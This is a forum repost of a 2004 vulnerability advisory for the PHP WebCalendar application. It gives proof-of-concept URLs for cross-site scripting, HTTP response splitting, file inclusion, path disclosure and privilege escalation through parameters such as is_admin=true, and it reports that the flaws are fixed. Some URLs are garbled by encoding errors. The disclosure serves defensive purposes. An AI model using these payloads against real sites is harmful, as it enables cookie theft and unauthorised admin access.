|
Home Forum Radio Memberlist Help Search Quick Links | |
| Forum Index » Internet » Security Alerts and vulnerabilities » Web Calendar Application |
| Security Alerts and vulnerabilities Lets keep abreast on the latest threats by posting those findings here.. |
 |
 |
|
Thread Tools | Display Modes |  |
|
#1
11-11-2004, 08:50 PM
|
||||
|
||||
|
WebCalendar is a PHP application used to maintain a calendar for a single user or an intranet group of users. It can also be configured as an event calendar.
Web : http://webcalendar.sourceforge.net Vulnerabilities: ~~~~~~~~~~~~~~~~ A. Cross Site Scripting Vulnerabilities in various scripts. A1. WebCalendar check the <script>any</script> format of XSS attacks but doesn't check <img src based attacks. To test the vulnerabilities you can try the following POCs: http://<site-with-webcalendar>/demo/view_entry.php?idA972"><img%20src=http://images.so urceforge.net/images/head_bg_new.gif%20onload=javascript:alert(document .cookie)>&date 041001 http://<site-with-webcalendar>/demo/view_d.php?ide7"><img%20src=http://images.sourcefo rge.net/images/head_bg_new.gif%20onload=javascript:alert(document .cookie)%20height=0%2 0width=0>&date 041009 http://<site-with-webcalendar>/demo/usersel.php?formÃ*itentryform.elements[20]; %0d%0aalert(document.cookie);//&listid &usersÞmo,demo1,demo2 http://<site-with-webcalendar>/demo/datesel.php?formÃ*itentryform.elements[20].rpt_day. selectedIndex%20=%20day%20-%201;alert(document.cookie);//"><img%20src=http://images.so urceforge.net/images/head_bg_new.gif%20onload=javascript:alert(document .cookie)>&fday= rpt_day&fmonth=rpt_month&fyear=rpt_year&date 041001 http://<site-with-webcalendar>/demo/datesel.php?formÃ*itentryform&fday=rpt_day"%20oncl i ck=javascript:alert(document.cookie)>&fmonth=rpt_m onth&fyear=rpt_year&date 041001 http://<site-with-webcalendar>/demo/includes/trailer.php?user="><img%20src=http://imag es.sourceforge.net/images/head_bg_new.gif%20onload=javascript:alert(document .cookie)> http://<site-with-webcalendar>/demo/includes/styles.php?FONTS=asdf}%0A--></style><s cript>alert(document.cookie)</script> NOTE: Almost any GLOBAL parameter in this script is vulnerable B. HTTP Response Splitting Error B1. Due to a poor input validation in the script login.php HTTP Response Splitting attacks are possible. You can try the vulnerability with the following POC : http://<site-with-webcalendar>/demo/login.php?return_path=%0d%0aContent-Length:0%0d%0a %0d%0aHTTP/1.1%20200%20OK%0d%0a%0d%0dContent-Type:text/html%0d%0aContent-Length:9%0d%0 aHi to all C. Possible code execution C1. If an attacker is abble to upload a file via ftp or other system to the web directory there is a flaw that allows to execute any file in the web tree. To try the vulnerability you can try this url : http://<site-with-webcalendar>/demo/includes/init.php?user_inc=the_file_that_you_uploa d_via_ftp_or_other Note: Almost this is a full path disclosure. D. Full Path Disclosure D1. Because of a poor validation of the parameter enconded_login in the PHP script validate.php, there is a vulnerability that shows the full path of the script in the web server. http://<site-with-webcalendar>/demo/includes/validate.php?encoded_login(Full Path Disclosure) E. Admin Privileges E1. To make various actions you need to be the administrator of the webcalendar application but various scripts are vulnerable to Variable Poisoning attacks. Privilege escalation is possible using the following methods : Example 1 : You doesn't have permission: http://<site-with-webcalendar>/demo/view_entry.php?idA972&date 041001&is_admin=true&is_nonuser_admin=true&is_assi stant=true But using it yes: http://<site-with-webcalendar>/demo/view_entry.php?idA972&date 041001&is_admin=true&is_nonuser_admin=true&is_assi stant=true Example 2 : http://<site-with-webcalendar>/demo/view_entry.php?idA972&date 041001&is_admin=true&is_nonuser_admin=true&is_assi stant=true&id Example 3 : No permission -> http://webcalendar.sourceforge.net/demo/upcoming.php Permission Granted [img]style_emoticons/<#EMO_DIR#>/smile.gif[/img] -> http://webcalendar.sourceforge.net/demo/up...bled=true&publi c_access=Y Notes ~~~~~ The poor method that uses to protect against XSS attacks in the script functions.php is the following : // This code is a temporary hack to make the application work when // register_globals is set to Off in php.ini (the default setting in // PHP 4.2.0 and after). if ( ! empty ( $HTTP_GET_VARS ) ) { while (list($key, $val) @each($HTTP_GET_VARS)) { // don't allow anything to have <script> in it... if ( ! is_array ( $val ) ) { if ( preg_match ( "/<\s*script/i", $val ) ) { echo "Security violation!"; exit; } } Is very easy to by pass these basic security checks by using Unicode encoded strings, or using any other valid XSS attack, such as <img src attacks. More Notes ~~~~~~~~~~ The developers (in special Jeff Hoover) of WebCalendar has been demostrated seriousness with the fixes and responses about these errors. The fix: ~~~~~~~~ The problems has been fixed in the CVS repository. 
|
 Posted |
|
| Currently Active Users Viewing This Thread: 1 (0 members and 1 guests) | |
| Thread Tools | |
| Display Modes | |
|
|
Similar Threads
|
||||
| Thread | Thread Starter | Forum | Replies | Last Post |
| hijack log | der | Spyware / Virus Removal | 46 | 10-04-2005 06:49 AM |
| Sun Java System Server XSite Scripting | Mobo | Security Alerts and vulnerabilities | 0 | 03-23-2005 01:00 PM |
| Looking for a desktop application | Raistlfiren | Windows 2000 | Windows xp | Vista | 2 | 01-07-2005 08:04 PM |
| WS-Ftp pro | Mobo | Software | 0 | 12-11-2004 07:25 PM |
| PhpNuke Event Calendar Module | Mobo | Security Alerts and vulnerabilities | 0 | 11-17-2004 10:31 PM |
|
||
|
|
|
It appears you have not yet registered with our community
which limits what you can do & see. It's Free To register, please click here.
Linear Mode
